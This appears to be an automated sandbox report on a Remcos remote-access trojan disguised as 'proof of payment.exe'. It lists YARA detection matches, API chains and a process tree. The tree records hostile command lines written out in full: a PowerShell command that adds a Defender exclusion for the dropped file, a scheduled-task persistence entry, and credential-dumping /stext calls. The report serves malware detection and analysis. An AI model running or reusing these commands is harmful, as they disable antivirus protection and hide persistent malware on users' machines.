                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: proof of payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: NvbYSEq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, HZasU9nsywqiKFgaDv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, HZasU9nsywqiKFgaDv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@28/15@1/2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00417952
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_00410DE1
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F474
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B4A8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Roaming\NvbYSEq.exe
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
                    Source: C:\Users\user\Desktop\proof of payment.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMutant created: \Sessions\1\BaseNamedObjects\CQjFNzs
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp
                    Source: proof of payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: proof of payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\proof of payment.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\proof of payment.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: proof of payment.exe, proof of payment.exe, 00000011.00000002.1688454390.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: proof of payment.exe, 0000000F.00000002.1697772966.0000000002897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: proof of payment.exeVirustotal: Detection: 55%
                    Source: proof of payment.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\proof of payment.exeFile read: C:\Users\user\Desktop\proof of payment.exe:Zone.Identifier
                    Source: C:\Users\user\Desktop\proof of payment.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\NvbYSEq.exe C:\Users\user\AppData\Roaming\NvbYSEq.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Process created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe  Process created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: version.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\proof of payment.exe  Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
